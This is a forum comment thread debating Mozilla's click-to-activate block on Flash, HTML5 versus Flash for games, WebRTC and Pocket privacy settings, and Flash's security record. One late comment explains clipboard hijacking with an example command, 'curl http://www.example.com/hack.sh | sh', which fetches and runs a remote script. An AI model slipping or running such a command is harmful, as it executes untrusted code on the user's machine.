To be clear, by "blocked" Flash we really mean enforced click-to-activate. User choice is always a #1 priority at Mozilla.
We regularly block vulnerable plugins. What made this block different was that we did it before Adobe made an update available. Now that Adobe has released an update, it is no longer true that every version of Flash Player is blocked in Firefox.
However, we're glad to see the conversation this has sparked. Personally I align with Alex Stamos regarding Flash, in the thinking that a formal EOL would be great.
I'd also like to use this space to make a shameless plug for Shumway, a project set on building a faithful an efficient renderer for the SWF file format without native code assistance. Ending Flash doesn't need to mean an end for Flash media. http://www.areweflashyet.com/shumway/
Technology should be replaced by better technology. To give you some background: I've written games for all kinds of platforms: PocketPC, Windows Mobile, (Desktop) Windows, Linux, OS X, Flash (AS3), HipTop, J2ME devices and some smaller proprietary devices.
Some of those platforms offer write once, run everywhere. On other platforms every device has it's own quirks and you have to test on every device and implement workarounds.
You might not like Flash, but it is great at running on every platform/browser with the same code base. If you test it on one platform, it runs on all others. (Adobe is also very good at keeping it backwards compatible)
Now, I ask you, what's the alternative for Flash? Does HTML5 offer write once, runs the same on every platform/browser(version!)? No it doesn't, and it never will. Even simple HTML pages are full of browser checking hacks.
Now, if you can offer a programming platform where the games I develop on, run exactly the same on every browser, on every platform, I have no problem killing Flash. But let's be honest here, only plugins can guarantee such a thing.
As to Alex Stamos, the top games on Facebook are all Flash. You know why? Because developers don't have to worry whether or not those games will run inside the users browser. Because once Flash is installed, they will run without issues. HTML5? No such guarantee.
So before you declare EOL, please have a proper alternative, where I don't have to pull my hair and cry all night because browser X on platform Y version Z seems to break the end boss of level 5 in my game because its implementation slightly differs from all the rest.
While I do understand where you are coming from - it can be more convenient to target a single implementation - the fact is that Flash has not been what you describe, for a while now. Flash officially announced it would no longer support Linux, and Flash is not usable in most mobile browsers either, for example.
Even plugins can't really get you what you want here. Yes, HTML5 has limitations, as you described, but plugins aren't the solution. HTML5 is closer, and moving in the right direction at least.
Mobile doesn't need browser plugins, because it has apps. AS3 compiles to Android and iOS, just as it should. So I agree with Adobe that mobile doesn't need to support Flash. BTW, the same AS3 codebase for Flash runs as mobile apps. Do the HTML5 games support all versions of all browsers on the most popular mobile devices? Not on mine at least :(.
One codebase, runs everywhere, Flash in the browser, apps on mobile devices. Personally never had an issue with it.
Although I must agree with you that it's sad Adobe dropped Linux support.
koonsolo is right on with all his points. Flash is better then HTML5 all around.
Though personally I can understand why Adobe dropped support for linux, the market is just too small. Even though this community probably has a higher percentage of linux user then just about anywhere.
Yeah and this community is made up by mostly developers. To turn your back on developers is shooting yourself in your own foot. However, that is not what adobe are doing. They have signalled their intention to sunset flash themselves for a long time.
Plugins allow you to more easily experiment with different distribution methods, languages, etc. Flash, Unity, the JVM, etc, all have areas that they're much better at, such as tooling support, language support, etc. Sticking everything in a monoculture is a terrible idea.
Flash isn't part of the Web. It's not vendor neutral.
If Adobe decides to deprioritise a platform that mean the users of that platform with experience less support in terms of bug fixes, performance and security. If Adobe decides not to support a platform period that means users of that platform are left without a means to access Flash content.
If you are a user this is unacceptable. More importantly these things have already happened.
I fully agree with you. But like I said, if technology is replaced, it should be replaced by better technology.
For websites, HTML5 offers enough to be considered a proper alternative. Yes, I probably dislike Flash websites as much as you do.
But for games, HTML5 just doesn't cut it compared to Flash (or yes, even Java applets as someone else mentioned ;)). And the sad truth is that by design, each browser vendor will have it's own implementation with it's own quirks.
(I seem to be getting a lot of down-votes on my original post, although I don't think I said anything incorrect)
I think the issue is with the 'better technology' bit. Flash simply isn't a better technology than HTML5. They are, as they say, a land of contrasts, each with their own strengths and weaknesses. But where HTML5 is moving forward, steadily improving, Flash is actually getting much worse with time, supporting an ever-smaller proportion of the net, and doing so with less stability and security.
The Web is better, it's vendor neutral and not depended on whims of Adobe. Sure it may not be convenient for developers but as a user it's very convenient.
> If Adobe decides to deprioritise a platform that mean the users of that platform with experience less support in terms of bug fixes, performance and security.
Case in point, OSX. Wasn't until Flash v11 that OSX had hardware-assisted playback.
Hi, while I got your point and mostly I agree with you, I just have a question.
Now when WebGL is widely adopted why you can create your games using that technology? Or even compile your C/C++ games with asm.js. I saw very nice demos in the past.
For simple 2D games (like most of the Flash games), I saw very nice Flash-friendly libraries like Phaser[0] (based on Pixi.js).
I went to that phaser.io url, and when clicking on the examples, I see a background with nothing on it. I don't know if it has to show something animated or not. I pushed the 'Run code' rocket button, but still nothing shows. How do I make it start?
This is in Firefix 39.0, Windows.
Let's try IE, I'm curious. I need to click 'Show all content' at the bottom, and after that I see the animations. I tried the 'virtual joystick dpad' example and it works. But the cutouts of the joypads seem off. You can see their rectangular cutout, got the impression transparency isn't working properly, but also possible it was designed that way. But I don't think so because the screenshot of that example doesn't have it, so I guess it is a platform issue.
One more go, my iPhone: It doesn't scale properly, way too big for my screen. Can't zoom out or scroll. But the animations seem to run in the corner of the screen that I can see. Same transparency issue as on IE.
And let's be honest here, those examples are pretty basic and simple.
Do you have any interest an organizing an effort, along with Facebook's Alex Stamos and other folks, to plan a formal EOL for Flash? Of course, the steps Mozilla and others have taken help, but perhaps a more organized movement could get other thought and market leaders on board, trigger higher rates of HTML5 adoption and foster the bits of remaining innovation that are needed to fully replace Flash on the web.
Also, does Firefox plan to address the concerns brought up about Hello, and, more importantly, Pocket?
To avoid inflaming the situation, I have deleted my erroneous (sibling) comment after @aroch's reply. I was not aware that Pocket sent no data without opting in.
> The choice is to install it by default and make users opt-out, giving the uninformed users' data to Pocket (and thus their "partners")?
Except no data is sent to Pocket unless you actually opt-in to the service by signing up. Unless you login to Pocket the plugin and all its communication code is inactive... It is fine ti not like the integration but spreading FUD is annoying
Data doesn't go to pocket until you start using it, and even then, you have to click through a few pages to get there. Pages which make it abundantly obvious that its a third party service.
Mozilla did user testing before integration and found that people do want it. Remember that techies complaining on HN doesn't mean that the majority doesn't like it.
It's not different from the privacy implications of having Google/Yahoo as a default search provider. It's a nice feature that (very visibly) uses a third party service instead of being part of Firefox Accounts.
"Mozilla did user testing before integration and found that people do want it. Remember that techies complaining on HN doesn't mean that the majority doesn't like it."
I'm really not convinced by this as an argument. People might like all sorts of harmful things, once they see them. And the fact that people might want something that provides the functionality that Pocket provides, or something like it, doesn't mean that using Pocket specifically is a good idea.
This is an argument against "users didn't like it", not in itself a reason to use Pocket. Though if you couple this with the fact that Pocket integration isn't much different from search does help its case.
I was advocating for this yesterday in /r/sysadmin and this morning it was a pleasant surprise to hear that this actually happened. I imagine you're getting all sorts of complaints from advertisers and others, but its the right move. The web is simply dangerous and having an unaccountable closed source binary happily running anything served to it is just crazy.
I'd love it if you kept it like this and implemented a flash whitelist function. Flash needs to be treated like Java: its legacy tech that should be used only via whitelisting. Google is too embedded into the marketing and advertising world to ever consider doing this in Chrome. Its really up to you guys, per usual, to save the web.
Removing registration on Hello servers and WebRTC altogether is not stupid if you give a shit about your privacy, look at the leaks WebRTC provides, local IPs which are great for fingerprinting, real IPs from behind VPN, etc. It's one big gaping privacy nightmare so far, so it's pretty reasonable to have it disabled, until this gets sorted out at least.
Fortunately it can be toggled off in about:config easily.
Set loop.enabled = false to disable hello, set media.peerconnection.enabled = false to disable WebRTC. If you don't want pocket, set browser.pocket.enabled = false.
You can even make yourself one big user.js file to fix the bad ideas that have been added to Firefox lately. Mozilla still has a good thing going for them, and that is user choice. However stupid the defaults get.
Right. It's like the "just hit delete" line from spammers, and the invisible "x" boxes to reject "shared" posts in Facebook.
Firefox doesn't even predefine some of the things in "about:config" that need to be set to turn off some of these undesirable features.
There's IceCat, a GNU fork of Firefox without all the proprietary extensions.[1] It may start getting more traction as Mozilla puts more junk in the browser.
It's a real pain, but they want the less sophisticated users to be able to take advantage of all the latest stuff and if Chrome or IE is shipping with it enabled, they have to compete. Well, that explains WebRTC at least. As for the other stuff...
I'm a Pocket user, but I have no idea why that needed to be integrated into the browser, seems like an insane decision to me. I hope they got a good pay day out of that.
Same as the history based advertising tiles. Sure, it's checked locally, it still seems creepy and annoying... but again, browser.newtabpage.enhanced = false.
Unless we lose this level of user choice, I don't see a better alternative. It would be nice if someone would ship some tool to automatically update a user.js file, however, I think many of us have different opinions about what feature we do and do not want enabled in our browsers.
Off by default lets everyone choose to turn it on if they're interested. It also might clue in Mozillas devs that if they want people to turn it on, a setting in about:config isn't the only place you should be putting the button.
Off by default is neither removing user choice, nor is it preventing Mozilla from saying they ship with feature X. It is the right way to present it.
> Off by default lets everyone choose to turn it on if they're interested.
It lets more sophisticated users choose. Less sophisticated users however will more likely switch to a different browser the moment a site doesn't work before poking through settings.
I think a better way than a separate setting would be to go in the direction of many software firewalls and present it to the user as a choice when an application requests it as many browsers currently do with the location APIs. This would provide individual domain-level control over what permissions sites are granted by you. I don't know why this sort of policy seems to be restricted only to the location APIs...
I agree with a lot of this, but not turning off WebRTC in general. Certainly you should turn it off (or force TURN only) if you're trying to hide your IP behind a VPN. But IPv6 already causes you to lose the same amount of privacy as exposing your IPv4 address behind a NAT, so it seems somewhat of a lost cause.
I still think WebRTC enabling peer to peer connections is better than running all of your data through a third party server.
> But IPv6 already causes you to lose the same amount of privacy as exposing your IPv4 address behind a NAT, so it seems somewhat of a lost cause.
Extremely few people have active IPv6, it seems unlikely to catch on now. In addition to that, IPv6 privacy extensions may allow a solution to this problem for many users, but if their link local IPs are also published that may lead to further trouble, depending on configuration. Remember though, this leaks all interface IPs, I have many virtual machines installed with their own network adapters added to my system, VPN adapters, etc which also leaks data as all of those adapters will have v6LL IPs on them even if they're not in use.
Additionally, this issue is already actively being used for fingerprinting. Not some exploit of tomorrow. There was a New York Times advertiser caught doing it a few days ago.
> I still think WebRTC enabling peer to peer connections is better than running all of your data through a third party server.
Yeah, which is why I encourage disabling it completely. Until either they fix the privacy issues or the value of using some WebRTC application appears to trump them to you.
IPV6 isn't going anywhere: IPV4 exhaustion is a real concern and with the internet / internet of things growing, the only place to grow is really the IPV6 space. NAT only delayed the inevitable.
Yeah, I know, many OSes do already prefer it by default. I see more pushes for CGN than I do for IPv6 as a solution to IPv4 depletion though, it just seems dead in the water, in my country at least. Maybe your ISPs are better, but no locally available ISP will offer me native v6, it's either real v4 or CGN v4.
>Extremely few people have active IPv6, it seems unlikely to catch on now.
Except that over 20% of the United States has IPv6 connectivity. In fact, you might be using it without knowing (most mobile providers have it now, in fact some use IPv6->IPv4 translation methods) [1].
>Remember though, this leaks all interface IPs
Does it? Maybe you should file a bug so that only routable interfaces and non-LL IPs are used. This does seem like a problem.
> Except that over 20% of the United States has IPv6 connectivity.
The entire rest of the world has near-zero, just look at your own link. I'm in Canada and we have 0.55% here. No local ISP will offer it to me, and the one that did withdrew it completely last year. So perhaps I'm just slighted. There are a few other countries with 5%+ but it still makes up only a very small percentage of internet users. To top it off, while there has been some IPv6 adoption in the US, CGN has also caught on pretty heavily all over the world and seems to be, sadly, the solution most ISPs will actually go with for the near term at least.
> Does it? Maybe you should file a bug so that only routable interfaces and non-LL IPs are used. This does seem like a problem.
https://diafygi.github.io/webrtc-ips/ is able to immediately reveal all the VM interfaces on my system even with no VMs using them. I suspect this is done so that faster routes may be established, but it is indeed a major problem for anyone who doesn't like fingerprinting.
Oh please don't remove pocket, this is one of the awesome feature of Firefox along with Tree Style Tab (and if it was just me I would add Tree Style Tab by default as well)
(And of course I go against the public opinion here on HN, but I wonder how many people did actually use Pocket before trashing it?)
It's debatable but I think something like pocket is fundamental to a 2015 browser experience. The bookmarking system has been bad since its beginnings.
These need to be disabled by default, and the steps you list should be taken by people who want to enable them.
If a masochistic user wants to navigate the labyrinth of dark patterns meant to confuse them into not understanding that the "Additional tools and features" category is also the "completely disabled features that run nothing in the background" category (why would anyone think that, ever?), then they can go ahead and do it. If these things are so great, then I'm sure users would be happy to put that extra work into enabling them. After all, it's 3 simple intuitive steps!
For some reason, I keep having to do that - it doesn't stick. And every version brings more unwanted toolbar buttons I need to remove. I'm seriously considering looking into building a version of Firefox with them patched out altogether.
Just out of curiosity, how will removing Pocket integration and Hello (a thin UI over WebRTC) personally? Both are lazy-loaded, so the only bloat they add is "visual bloat". This behavior is seriously disappointing from the Firefox community.
I've been using Pocket since it was Read It Later and I was pleased to see it integrated into the browser. Mozilla is working on a Reader mode[0] but it does not seem to be ready for public consumption yet (despite landing in 2012). Most people don't even know it exists, and it obviously does not save it for later (unless you bookmark it). The implementation is open-source (MPL license), although Pocket itself is proprietary. Hotword detection is not absolutely necessary for browser functionality, yet I hear no chorus of complaints from Chrome users. Should Mozilla be prohibited from partnering with proprietary third-parties whether or not it benefits their users?
Hello is even less of an argument. Firefox Hello is a simple Javascript UI for the existing WebRTC spec supported by Firefox, Chrome, and Opera[1]. It allows people to communicate without having to set up accounts, sign-in somewhere, and works against the platform lock-in of proprietary services such as Facetime, Hangouts, and Skype. If it's disabled by default, the service becomes useless. My parents shouldn't have to enable it about:config for me to talk to them, nor should they have to download another plugin to use a technology built-in to the browser. I understand the security implications[2] in IP leakage[3], but I don't see a simple fix that doesn't neuter the functionality (although this comes close[4]). W3C has stated their position on fingerprinting[5], but at least Mozilla is actively working on the issue.
I noticed this behavior when I fired up an older Mac I hadn't used in a year or so, it was refreshing that Flash always required click-to-activate, and I made this the setting on all my machines a while back and started suggesting to my friends to.
Some websites' video don't work as well, they have JS or CSS that interfere, or assume that you don't have flash installed, or retaliate as if you are an ad blocker, so I'm glad to see this is becoming more widespread, those problems may be fixed.
Is Shumway a possible replacement for Scratch 2's flash implementation? They seem to think that there are some flash things that just can't be done without flash:
Unimplementable Features on iOS: Image effects for whirl, fisheye,
mosaic, and pixelate. Sound and video input for loudness, video
motion, and touching colors from the video.
The next time this happens can you please disable it entirely?
The things on my site (video, some ads) that use flash will fall back nicely to HTML5 is Flash is disabled, as will most of the web. Click to activate is the worst of both worlds.
That's completely technically meaningless without EOLing NPAPI, and Google's currently the only people brave enough to do that. Firefox's EME implementation is strictly less of a threat to your privacy than the current status quo, by design.
NPAPI has its own privacy and security and stability reasons to meet a swift doom, even independent of the DRM question.
The web has become an application delivery platform, like it or not. While there are arguments against forcing DRM on consumers, for video production workflows and project management, DRM is a necessity. I'm assuming you've worked with private Github repos with access control, right? Same idea.
How are private Github repositories using the same idea? Normal access controls are just implemented at the data source, limiting read (or write) there. DRM is implemented in the hardware of the user so that some programs that the user uses can access the data, but not those programs fully under control of the user.
If you can access a Github repository then you can do so with software fully under your control (and hence make copies of the data as you wish). Did I miss something?
Okay, so maybe not the best analogy. Contact access expiration via git is far more primitive, sure - if you have access today you can clone a private project and have a snapshot of it in that state, once your access rights are revoked you just won't see any further work. Unfortunately, this 'freedom' leads to far more problems than it solves - horrible corporate bureaucracies around where you may or may not check code out to, remote wipe capability, contractor laptops, etc. There are many real-world use cases where, in order to accomplish the completion of a project, you need to provide an external resource with access to sensitive data for a limited amount of time. Think manufacturing, commercial video production, medical data, game development - pretty much anything where you outsource a specific phase of product development to a third party. Without DRM, these workflows are limited to online-only, where assets are streamed and can't be stored locally. This is a dealbreaker when, for example, you need to send part specs to a manufacturer in the middle of China.
>There are many real-world use cases where, in order to accomplish the completion of a project, you need to provide an external resource with access to sensitive data for a limited amount of time.
Well, then there are many real world use case that are not doable in our version of reality, where data can be copied ad infinitum, and where you NEED to show the end user unencrypted data.
A political necessity, certainly not a technical one. The default state of content is open, restricting it should be seen for the positive (read: affirmatively taken) action that it is.
"To prevent these add-ons from running, click Restart Firefox."
Why doesn't the dialog box have that same explanation? Did you (mozilla) think the two button options "Restart Later" and "Restart Firefox" won't confuse people?
I second this! Tree Style Tab is one of the few addons that I cannot live without. Heck, it is one of the reasons why Firefox is my primary browser.
This feature should be made native and the original developer should be rewarded somehow for his efforts.
One slightly annoying thing i found right now is that if i have a plugin set as disabled in about:addons, it will not show up on the update checker found in the top link.
The (unprivileged) Plugin Check website can't detect disabled plugins because they don't show up in navigator.plugins. Ideally, Plugin Check should be an automatic check built into Firefox. The advantage of the Plugin Check website is that it works in any browser.
Couldn't you preserve the nice trait of working in any browser by having the browser load it with a hash-fragment containing a list of disabled plugins to add to navigator.plugins?
I don't know that it's particularly faster than what can/could be accomplished with svg + JavaScript ...
I think most of the speed as a plugin vs native html/svg/js is that you don't have the whole DOM to deal with (including reflows, etc), and that their ActionScript is a much smaller subset of a language than JS in the browser, AS3 changed things a bit though. Today with canvas and an audio api that mostly works, you can get the same.
What I really wish is that Adobe would create Flash-level tooling with outputs for HTML/canvas/js/web-audio and video.
The tooling was amazing. I used to do a ton of Flash development back in the day, and the ability to seamlessly create the UI and backend code is still light years ahead of the cross-browser nightmare of creating HTML5 apps. I think Adobe has tried to achieve the same level of functionality with other tools over the years (Adobe Edge Suite), but it never really made it to the same level as web application development in Flash.
actionscript (the flash programming language) is pretty much the same as javascript, the main reason why flash is often a lot faster than html+js things in a browser is it is not constrained to a slow, broken DOM for building uis.
I think the answer is probably Tamarin[1] which started life as Flash's ActionScript engine and has since been donated to Mozilla. The Flash Player has also had direct GPU support for graphics and video for many years.
So retrofitting arbitrary layouts onto a ~text document specific one is that much an error. In hindsight I find it fantastic how web pages became the basis infrastructure of all this UX reinvention.
For what it's worth, the shumway racing AS3 demo appeared to work but froze all input like closing or switching tabs for me and I had to kill it with task manager. Windows 8.1, Firefox 39.0.
Why isn't Mozilla spending more time to ensure Firefox is using all of the security resources that the OS gives it? Things like ASLR still aren't enabled by default, let alone plugin sandboxing like what exists in Chrome. While Shumway would be nice, having a reliable, secure way to hook into native code would be a lot nicer.
... alternatives like Google's closed-source Chrome, Apple's closed-source and behind-the-times Safari, and Internet Explorer???
Are you trolling? Are you attempting to discredit the anti-Firefox campaign by trying to say that running Internet Explorer is a reasonable alternative for your Macbook, and that a kernel panic from non-kernel software is somehow the software's fault, not the kernel's??
Job done. No more Mozilla annoyances between me and the content I wish to access. And yes, it was an annoyance because the link to "check for updates" in your message would not get me anywhere. That was a flaw in your strategy that I now suspect was deliberate. I really can't respect engineered annoyances that align with agendas rather than good UX.
I like Flash when it's done well. Raw performance and efficiency is one of the things I like about it. The powerful multimedia handling of everything from audio to video cannot be matched by HTML5. I'm an HTML/CSS/JS dev for my living for 20 years, that's how I know this to be true.
HTML5 video is cute. But it doesn't cut the mustard in all circumstances.
360 video, VR, and many other things will come along that are too much for web technologies to handle. Flash serves a useful purpose in allowing websites to cater to the most demanding cutting edge tech and content without needing the Firefoxes and Chromes of the world to keep up.
"closed source"; "battery drain"; "plugins are just bad".... oh cry me a river.
Holy shit. Flash has over 34 CVEs in one week—and only because a prominent organization that was sitting on a bunch of them got hacked—and you call mozilla taking steps to protect the security and integrity of their customers an "engineered annoyance"?
Performance is better than javascript. But then, who here has done a side by side comparison?
A: Built something in Flash
B: Built the exact same thing in JS and measured their performance side by side in the page, and on separate pages.
Even sliding an image - such a simple thing. Make it whoosh to the left. Guess what? Flash will whoosh it quicker and smoother on browsers with Flash installed.
I love JS, it's cool for web stuff and data fetching and sorting for a huge percentage of the internet. I had a great time with it doing multiple AJAX calls and sorting for a single page thing on a heavy traffic media site. Love the whole promises thing for sorting out those pesky asynchronous dinguses. Yep. HTML5 does indeed rock. Really love modern CSS too. Hate grids though but each to their own. I don't say "grids should die".
JS/HTML is not superman. If you want superman on your webpage, you need something more, such as a plugin.
Unity plugin. I might use that next. I really don't want to be fighting people about the value of plugins, even if that value and scope is reduced from what it is a few years ago, it's still there. I want to make games, and what is clear to me after trying an HTML game is that..... it's pretty much a joke. HTML5 games in 2015 are, a joke.
How dare anyone at Firefox or Facebook put forward an EOL for someone else's technology. EOL your own stuff, not someone elses. Bloody rude if you ask me.
"Flash should die because it has equal performance to native iOS apps". That's what I read between the lines in Jobs' letter. I like Steve Jobs, but he was a player. A chess player. We respect chess players, but they won't hesitate to knife you in-game.
If Flash dies, it's the hate that killed it more than any sensible reflection on the technologies we have available and how they can best be used.
If nothing else, hope I've added more comedy for you.
And yet, my system is squeaky clean, and has been for years.
And shock horror, I don't even have a virus protection program installed. I install one ever 12 months or so. Actually I install a few at one time to be thorough. Do a complete scan, and of course it comes up 100% clean, then I uninstall all of them and get on with work.
Continue being paranoid and using up CPU cycles to serve your paranoia while I enjoy a lighting fast workstation. The choice is yours. Choice is good.
When I was student, I didn't buy games. I downloaded them. Got malware and worse even with virus protection. I buy games, since about 2002 I just buy the software I want. No virus/malware issues here.
Bugs are always bad (and security bugs even more so) - but I've always felt that Flash gets a disproportional amount of hate/hype in the media. To some degree it should be normal that the more widespread a technology is - the more it gets targeted for security exploits.
If you run the popular browsers/plugins against the National Vulnerability Database, you'd get the following results (as of January 2014):
- Internet Explorer 366 total vulnerability issues (314 high severity)
- Google Chrome 235 total vulnerability issues (154 high severity)
- Adobe Flash 207 total vulnerability issues (169 high severity)
- Mozilla Firefox 190 total vulnerability issues (86 high severity)
- Oracle Java 161 total vulnerability issues (69 high severity)
I have a lot of experience of end users and they are forever telling me that they get so many different "Update this", "Update that" windows that they can no longer distinguish real from fake. Some of them have been tricked by fake web site pop-ups as a result, others ignore legitimate update messages. I do not blame them.
Internet Explorer and Google Chrome get updated in a way that most end users find to be simple to understand, particularly with Chrome. Firefox is also quite good in this regard. All of them are reliable - it is rare, IME, to come across a Windows Update, Firefox or Chrome instance which is silently failing to update. Or not even bothering to prompt to update.
Flash, however often I install it, just doesn't seem to auto-update reliably. Quite often it only does so after a user log on/reboot, which doesn't happen much in the days of standby. Even on brand new, fresh Windows installs (so we know the OS/Flash isn't broken), I test Flash from time to time and it just doesn't prompt to update at all on some occasions. This is what makes Adobe's poor track record exponentially worse - that their software update mechanism is crap at best.
I was gobsmacked when Microsoft declared they were going to start updating Flash via Windows Update. Gobsmacked and so very relieved. It felt like they'd walked into Adobe's office, grabbed their fire extinguishers and told them "You are so useless that when there's a fire, WE will come and put it out, since you don't seem able to. We are sick of our offices getting burned down because of your idle incompetence."
I won't even address Oracle's Java. Bundling malware with their updater is tantamount to crime.
That's the real reason they don't want a auto-update. Google pays them a lot for bundling Chrome(I think it's around $1 per install). They keep breaking the auto-update on purpose so that they can make a ton of money by bundling other software. Same with Java updates.
Shock, the only browser that still uses NPAPI is the descendant of the one that invented it!
Really, at this point I think Mozilla is more interested in just getting rid of plugins than trying to implement an alternative to NPAPI - why put all the effort in to support something like PPAPI when plugins should be dead within the decade anyway?
Yes! I admin my parents' computers and after trying to explain which 'update' windows are genuine, I realised that there just isn't a good way to tell them apart.
Silent auto-updates are really the right way to go for non-techies. Even the post-upgrade 'announcement' popups are confusing. For instance, I've installed Ghostery on their computers and the 'ghostery has been updated' popup is just confusing for them, leading to confusion and phone calls to me.
Flash also doesn't seem to auto-update for them, despite me setting it up. I don't understand it either, as they turn off & on the machine regularly. Why can't Adobe get this right?
Flash also comes with McAffee (or some other bundleware). I wouldn't be surprised if the reason why they haven't made a proper auto-updater is because of that. That they'd miss out on those miniscule profits they get from that.
Yeah, I've been wondering why Adobe sticks to a "visit our website and manually download the new version" update model in this day and age. I think you found the answer.
If you keep ignoring the update prompt, Flash will quietly update itself after 45 days. That's long enough for every interested party to pwn your machine.
This right here pretty much kills any sympathy I had for Adobe in this matter. They sit on their hands for far too long when vulns are announced, and when they do get updates out, they use a completely backwards and useless update model in the name of extracting a few pennies per user.
I have had multiple non-technical friends, in one case on a fresh install I'd done myself, run into the Flash update window simply showing a gray background that never does anything.
The best solution for this, from Adobe's own forum? Find the corporate-deployment version, download that (ignoring the messages that say it isn't what you want) and run it. This works flawlessly, but even less automatically.
Both the Flash and Java updates almost feel like "Pay Attention To Me!" Just like all those discount cards that exist in part so you carry around a fetish with the corporate logo.
I have a lot of experience of end users and they are
forever telling me that they get so many different "Update
this", "Update that" windows that they can no longer
distinguish real from fake. Some of them have been tricked
by fake web site pop-ups as a result, others ignore
legitimate update messages. I do not blame them.
One solution to this is to use AdBlock Plus. When a site permits adverts that threaten a computer's security, it is time to add it to the blocklist.
It seems to work ok if you install it for them - I now tend to do that for non tech users who I help out. Though usually uBlock rather than AdBlock Plus. It's scary if you go to a download site these days how many fake download buttons there are near the real one if you don't do something like that.
One notable exception is Major Geeks. However, it's important to donate them a few bucks for staff and bandwidth because they are giving up a ton of money by not bundling crapware and confusing people.
http://www.majorgeeks.com/mg/topdownloads/index.html
Remote code execution exploits were found in Firefox at least once per month during the first half of 2015. The only reason we didn't hear about these cataclysmic exploits is because it wasn't Flash.
Hackers search for remote code execution exploits in Flash first and foremost because they know a successful Flash exploit will reach the highest number of targets (90% or more on the desktop) whereas only 44% of desktop machines are running Chrome and 15% are running Firefox.
Hackers seeking out and exploiting RCE bugs in Firefox is unheard of for the same reason malware targeting Macs has been virtually unheard of over the past decade: It's not that OS X is more secure; it's simply that Windows is a more lucrative target.
Mozilla seems to take anywhere from 1 to 3 months to fix these severe bugs. Adobe takes days.
Source for this complete and utter FUD? Certainly not the links you gave:
Jan 11, 2015: Originally reported to Mozilla as a low-severity DoS, which turned out to be already patched in trunk
Jan 13, 2015: Firefox 35.0 shipped with patch
It's hard to get dates out of the others because the bugs are still hidden, but the "fixed in" is often a security fix update after a release, which means it can't possibly have been > 6 weeks.
> If you run the popular browsers/plugins against the National Vulnerability Database...
That's misusing statistics, you can't determine how secure something is by just summing up the number of vulnerabilities - equally weighing/comparing browsers with a plugin etc.
By the way, Apple's opinion on Flash in 2010:
Third, there’s reliability, security and performance.
Symantec recently highlighted Flash for having one of the worst security records in 2009. We also know first hand that Flash is the number one reason Macs crash. We have been working with Adobe to fix these problems, but they have persisted for several years now. We don’t want to reduce the reliability and security of our iPhones, iPods and iPads by adding Flash.
Also, considering the track record of Flash on Android, your opinion is not supported by historical fact. It is very clear that Adobe is not on the ball to anyone who pays attention.
Sure, and one of those business reasons is keeping bloated, buggy software that is ill-suited to mobile devices away from their phone's user experience.
Flash was never "blocked" on Apple devices. Rather, Safari on iOS simply doesn't support plugins. You can't install Java, Silverlight, or Unity 3D plugins either.
So Flash is second in terms of number of high severity bugs and first in terms of the percentage of bugs that are high severity, only being beaten by Internet Explorer. By your evidence the hate for Flash is quite justifiable.
Flash bugs are more important because the are crossbrowser. I will still use Flash though on older computers, because it needs less resources for video.
Yes but Flash vulnerabilities are incremental vulnerabilities.
So just counting high severity vulnerabilities, the chart is
IE: 314. IE with Flash: 483.
Chrome: 154: Chrome with Flash: 323.
Firefox: 86. Firefox with Flash: 255.
And of course, you can add a third column for Java and a fourth column for browser with Flash and Java.
I have no idea what their bugs-per-line-of-code are, perhaps they have the finest code on the planet. But from a surface area perspective, installing Flash makes you more vulnerable, period. And it really is not necessary, whereas it’s not like you can browse the web in pure Flash and not install a browser.
>But from a surface area perspective, installing Flash makes you more vulnerable, period.
So does turning on Javascript. Yet the popular opinion these days is that disabling Javascript makes you a luddite. Mozilla even hid the option for it in Firefox.
Yes, but Flash alone doubles the attack vector of a browser - that's nothing to be sneezed at. I think it's particularly poignant when you look at the high severity metric.
I am not sure the attack vector argument is 100% valid here, as flash replacement technologies constantly add attack vectors to modern browsers, too. Many traditional Flash features are now covered by webGL accelerated browser functionality, like accelerated 2D canvas elements. My guess would be that this browser-gpu bridge creates a whole zoo of GPU driver related security issues which attackers might focus on once flash is completely obsolete. (My money is on a remote code execution vulnerability in the Firefox Adobe DRM module.)
Turing-complete machine running untrusted code is a nightmare for security. There always be bugs and exploits, it's just a matter of time and effort to find them.
JavaScript enabled by default is already bad enough. We don't need Flash, Java, ActiveX or anything similar turned on by default. So it's a good move from security viewpoint. Less attack surface.
They do get more bad press than perhaps others should. There is already a perception about Flash that it is not a great product, which feeds into this. Reasons are varied.
- Performance has not been good on Macs (my 2007 Macbook Pro literally burned my legs when running anything flashy)
- Flash updates mechanism seems a little spammy.
- Long-term perception of Adobe as a maker of a somewhat buggy, somewhat bloated software
- Steve Jobs' public denigration
- Backlash against proprietary standards being used on the web
The best thing about click to play Flash is it puts a stop to autoplay videos on the less reputable sites I occasionally and shamefully glance at for sports news.
I don't think the hate comes from bugs or exploits.
I think people hate flash because it is laggy, slow, make things move in your screen you don't want, widely use for ads or to shit on the user experience, etc.
Granted most of it might be bad programming, but I still think he comes from here rather than exploits.
In general, plugins are supposed to improve a product by adding or enhancing existing features. Flash however enables websites to break out of the HTML, CSS and JS environments and their security constraints, which should mean that flash have a larger responsibility regarding security. If Flash lived under the constraints of the browser own security, then flash bugs would barely register as news worthy.
Another point that hasn't been raised yet: Flash is a much smaller software than a browser, how come it has more bugs ? It certainly speaks for it's internal code quality.
Cost/benefit seems higher for Flash/Java than browsers. You really need a browser, but you don't really need a [fancy thing that can't be done in JS]. As another commenter said, it doubles your attack surface and for little benefit.
Flash game enthusiasts would probably disagree, but most of us can probably do without it given the risk.
As an enthusiast for a handful of flash games, it is increasingly tempting to make a VM just for running them. Even then, with all the progress in Javascript, it's questionable whether I should bother.
Hey, thanks for the headsup. We had an old component that we used as a fallback for certain kinds of videos that was always active. It was a legacy component that just got forgotten. I removed the Flash fallback about half an hour ago, so this shouldn't be showing up anymore.
Something I noticed after making my Flash click-to-activate a while back. That seems like a HUMONGOUS tunnel to create in order to allow copy to clipboard, and fairly irresponsible on GitHub's part.
What developer doesn't know how to copy to clipboard?
Github claims that the flash version is "currently the only reliable way to put data in the clipboard". This seems to indicate that they looked at the native browser option and found it unacceptable for their use case.
Thanks for that link, I hit this problem a while ago, a program I wrote generates HTML results where I want to cut & paste sections into another file. I couldn't find a way to do so in javascript previously.
The parent comment has been deleted, so I don't know what privacy problems they are referring to, however there is a potential security issue in allowing javascript write access to the clipboard. e.g. an evil website could repeatedly stuff code into the clipboard, so the next time you paste something into a terminal window, you end up with a 'curl http://www.example.com/hack.sh | sh' command and not the text you expected...
The other concern is bugs in the implementation that injects clipboard access into the JavaScript sandbox. Write-only might be the intent, but this could open up possibilities to gain read access.
They seem to use it for clipboard access, some repository links have a button that puts the URI in you clipboard automatically. I'm not sure if there is anything else they are using it for.
